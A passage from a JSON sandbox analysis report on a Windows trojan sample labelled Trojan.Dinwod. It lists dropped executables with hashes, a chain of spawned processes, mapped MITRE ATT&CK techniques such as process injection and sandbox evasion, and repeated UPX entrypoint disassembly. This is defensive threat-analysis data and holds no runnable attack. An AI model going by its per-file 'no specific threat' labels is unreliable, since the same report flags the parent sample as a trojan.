"sha256": "3d79df1aaa3a5ddea7af4a4b25fa44482cfec36d4b4d98aa5ac9aca5a21553d0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bfltjr.exe", "file_size": 342895, "sha256": "6a4f54da721bc4b242b7723bb08cd0fd662c3bbc1fe32ad502d7491d25763b03", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "htplvld.exe", "file_size": 342875, "sha256": "f52b7897f69164840176ec056465d603188eed010611c839cb203faadfded7de", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "024046.exe", "file_size": 342864, "sha256": "058ed0ec79ab8f13b7856664675ccf521b6e8ad29a6b67bba136ec07cdc82236", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4088402.exe", "file_size": 342848, "sha256": "8b8f1390549a30c0ce563bfc7c7be7a18de898ec476c91a0ebbe8da185e94479", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "046486.exe", "file_size": 342837, "sha256": "72799fc3595220411dc722f500ccf12fadd1a7e91b271d50125618df5d63b2ab", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "282482.exe", "file_size": 342821, "sha256": "8acbc92e9fd38cc263ae5b73f5ad6e84f151870a7f82c99ca798e9b433af7641", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pljnf.exe", "file_size": 342811, "sha256": "233973bdb63faf6c41282858a22a3e811fd70b8472c5b4866b8c7b326d9c6c56", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "thdjjv.exe", "file_size": 342800, "sha256": "c7b43afc83424d86b9763b9cbfe0267d318d31cc8d3f8b563287e5780b5f17e2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00006020", "name": "7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe", "normalized_path": "C:\\7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe", "sha256": "7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9", "av_label": "Trojan.Dinwod", "av_matched": 17, "av_total": 22}, {"uid": "00000000-00005816", "parentuid": "00000000-00006020", "name": "620006.exe", "normalized_path": "c:\\620006.exe", "sha256": "caef5d3f79ea8ab56b85fd627f5f82b5f06afb1d2476ee8083368245e509679a"}, {"uid": "00000000-00005952", "parentuid": "00000000-00005816", "name": "lvhxj.exe", "normalized_path": "c:\\lvhxj.exe", "sha256": "2df0082c0a3c7a184c460e7d668de3d73eba9c4f21a0e50c271e3c79a914e3cf"}, {"uid": "00000000-00005896", "parentuid": "00000000-00005952", "name": "pthnb.exe", "normalized_path": "c:\\pthnb.exe", "sha256": "21cc99b2a2fcd1fe6c168528f194387850e25d9e07c0d4b24acbfa9b6bc6c7b3"}, {"uid": "00000000-00005868", "parentuid": "00000000-00005896", "name": "00802.exe", "normalized_path": "c:\\00802.exe", "sha256": "b51ed39019b07e834acabafdad23c2d3195887d00a8633c1c91b640130298a84"}, {"uid": "00000000-00005888", "parentuid": "00000000-00005868", "name": "660202.exe", "normalized_path": "c:\\660202.exe", "sha256": "6e3e0d76011e61bf9701c83026960a8858db71696f9bf5c07a15877b0164939e"}, {"uid": "00000000-00006132", "parentuid": "00000000-00005888", "name": "trrtd.exe", "normalized_path": "c:\\trrtd.exe", "sha256": "61f8158fbd846ce97147e77fff54daa01982689593bcfd4f10fb13cde57bf7d7"}, {"uid": "00000000-00005976", "parentuid": "00000000-00006132", "name": "pdrvn.exe", "normalized_path": "c:\\pdrvn.exe", "sha256": "fd38f0702cd0459be84d182d33221522f409a1b4955d70111327139302a4d250"}, {"uid": "00000000-00004296", "parentuid": "00000000-00005976", "name": "xjdpttx.exe", "normalized_path": "c:\\xjdpttx.exe", "sha256": "e222c7d3f1e2034e464650821233ac0551d0c0ad38fd3a7d3745d5d1833419d5"}, {"uid": "00000000-00006080", "parentuid": "00000000-00004296", "name": "208464.exe", "normalized_path": "c:\\208464.exe", "sha256": "a40aac3180dfb92de42ad3edf4c29ea01c58fef1ef854eb097c92d0da0ef6306"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ffffffr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"lvhrb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bfltjr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"htplvld.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"024046.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4088402.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"046486.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"282482.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"pljnf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"thdjjv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hhbbtl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"884648.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"82440.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"648086.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bnbhnh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rjlbldf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dndhhn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"688844.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"464204.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"442444.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"644444.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"26400.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"286488.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"482480.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ffffffr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"lvhrb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bfltjr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"htplvld.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"024046.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4088402.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"046486.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"282482.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"pljnf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"thdjjv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hhbbtl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"884648.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"82440.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"648086.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, 